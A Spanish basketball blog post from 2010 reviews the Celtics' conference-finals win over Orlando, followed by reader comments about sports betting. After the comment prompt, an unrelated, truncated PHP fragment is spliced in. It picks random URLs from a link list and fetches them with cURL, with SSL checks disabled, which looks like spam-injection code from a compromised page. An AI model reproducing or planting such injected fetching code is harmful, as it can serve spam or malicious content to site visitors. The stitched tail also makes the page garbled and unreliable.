Playoffs 2009/10: Finales de conferencia Este

30 de May de 2010 por TheDeerHunter

Los Celtics lo han vuelto a lograr. Con la eliminación de Orlando se han pulido a los dos mejores equipos de la regular season y, de paso, nos han dejado a la inmensa mayoría con cara de paletos. Sobre todo a los que auguraban una serie fácil para el equipo de Florida. Por muy poco los Celtics no sacaron las escobas.

Y es que, los hombres de Van Gundy llegaban a este punto con la vitola de claros favoritos, con merecimiento además. Han llegado a alcanzar puntos de nivel realmente altos, sobre todo en las dos primeras rondas. Sin fisuras ni en ataque ni en defensa.

Tampoco se puede decir que lo que ha pasado haya sido producto del exceso de confianza. Sencillamente los Celtics han sido superiores y lo demostraron desde el primer partido. Los Magic se han estrellado contra la defensa planteada por Rivers. De los más de 107 puntos por partido anotados contra los Hawks han pasado a poco más de 90. Casi 20 puntos de promedio de diferencia. Ya sea neutralizando a Howard o desarbolando al conjunto, los Celtics no han dejado encontrarse a si mismo a sus rivales. Han llegado a hacer parecer a Orlando como un equipo vulgar y eso es, al mismo tiempo, mérito de Rivers tanto como demérito de Stan Van Gundy, que no ha sido capaz de encontrar respuestas. Posiblemente esta sea su sentencia en la franquicia.

Frente al naufragio de Rashard Lewis, Nelson, Carter…, de la plantilla más equilibrada y profunda de la liga, hasta por momentos del de Howard… Paul Pierce y también Ray Allen han hecho lo que les ha venido en gana. A su mejor nivel desde el anillo en el 2008. Todos en general han aportado su grano de arena en defensa, el mejor quinteto de la liga más la dudosa segunda unidad verde, que ha aparentado incluso ser superior a la de Orlando. Es el momento de aclarar la voz y entonar el “BEAT L.A.!!!”

PREMIOS

MVP: No llegaremos a entender el porqué de los cambios de asignación de Stan Van Gundy sobre Paul Pierce. Teníamos a Matt Barnes como uno de los mejores defensores exteriores de la postemporada. Ni Vince, ni él ni mucho menos Pietrus han logrado siquiera molestar a Pierce. Más de 24 puntos, 8 rebotes, casi 4 asistencias y 2 robos. Con porcentajes escandalosos. Al nivel de su mejor versión.

La sorpresa: Quitando el partido del codazo, Glenn Davis se ha destapado como un recurso de primer nivel en su equipo. Juega más minutos que Rasheed y casi tantos como Perkins. Grande Big Baby.

La decepción: Difícil elección. Podríamos hablar de muchos asuntos en esta línea en contra de Orlando. La mayor ha sido Rashard Lewis. Según se excusa él todo ha sido culpa de un virus estomacal. Si esto no es cierto el verdadero virus para Orlando lo es él.

El mayor esfuerzo en vano: Howard lo ha pasado muy mal en esta serie. Pero es el único que puede salvarse de todo su equipo.

Comenta

9 comentarios a esta entrada

  1. KB#24 dice:
    #1

    Antes de empezar las semis de conferencia me aposté 20€ que LAL ganaban el titulo, creo que cada dia que pasa estoy mas cerca de cobrar mis 44 jajaja

    Visto lo visto, Boston es, merecidamente finalista, la serie contra Orlando no tuvo color, la seguí y el juego que hicieron los pupilos de JVG fue lamentable, sin circulación de balón, sin elaboración de jugada, tirando cada ataque de la inspiración individual.
    La verdad que para jugarte unas finales de conferencia con los tiritos de tus cracks sin jugar a nada lo veo un poco tonto, pero bueno se ve que en Florida las cosas van así.

    No me gustó para nada la dirección del equipo por parte de Ron Jeremy!

      Citar

  2. Love Denise dice:
    #2

    Has puesto JVG (jeff Van Gundy?), te has equivocado de hermano:)

    Si tan seguro estabas de que ganaban los Lakers, haber apostado más hombre:), yo aposté 100 por Orlando hace unos meses (el dia despues de la victoria vs Lakers, aquella del puñetazo de Gasol a hOward)y se pagaba 8 a 1, mientras que la de los Lakers 4 a 1, por el 3 a 1 de los Cavs.

      Citar

  3. TheDeerHunter dice:
    #3

    bien dicho, crack!!!
    la selección española estaba la semana pasada en un 5.5 a 1 por si a alguien le interesa

      Citar

  4. Love Denise dice:
    #4

    por la selección española no apuesto ni un pelo del pezón:), para que, para eliminarse en cuartos (si es que llega), la tradición, es la tradición por mucha Eurocopa que se ganase:). quizás apueste por Inglaterra o Italia

      Citar

  5. TheDeerHunter dice:
    #5

    Tengo mucho respeto a la tradición… aunque primero van otras cosas, como por ejemplo el hecho que por primera vez en la historia se puede decir sin temor a equivocarse que se tiene la mejor selección hombre por hombre (y tal vez equipo por equipo) el mundo.

    Si nos atenemos a la tradición exclusivamente… puedes ver cuantos guarrazos se pegaron los alemanes antes de romperla, por ejemplo. O qué le pasó por la cabeza a Magic Johnson cuando anotó su Baby Hook en toda la cara de McHale y Parish.
    Y hablar de tradición con Inglaterra tiene pelotas, por mucho que fueran ellos quienes inventaron el futbol.

    Quizás no son malas apuestas, no obstante, si tienen un buen rendimiento. Yo por mi parte me divertirá más apostando por la roja.

      Citar

  6. kantonyo dice:
    #6

    Joder Love, 800 euros te hubieras llevado….

    Yo he aprendido hace tiempo que es mejor apostar contra tu equipo favorito. Si ganas te llevas pelas y sino la alegría de haber ganado. Por que sino te entra una mala hostia!!

      Citar

  7. Love Denise dice:
    #7

    me ha gustado eso kantonyo, nunca lo había pensado:)
    para cerrar el tema, deer, lo del mejor equipo del mundo, en mi opinión, no influye mucho cuando las eliminatorias son a 1 partido como octavos, cuartos, ….en formato de liga, probablemente ganaría España, a 1 partido puede pasar de todo.., recuerda el Angolazo, o el triunfo de EEUU vs España el año pasado en la Copa Confederaciones.

      Citar

  8. TheDeerHunter dice:
    #8

    jejeje, yo lo veo como si ganas o pierdes no terminas de estar contento.

    Y sí, LDenise… toda la razón. En el riesgo está el placer de todo esto. Nadie dijo que fuera a ser fácil.

    Os aseguro que si por una de esas gano esta apuesta la voy a liar parda.

      Citar

  9. mmmm dice:
    #9

    Yo a España no apuesto ni los calzoncillos. Es como el atleti pero en selección.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>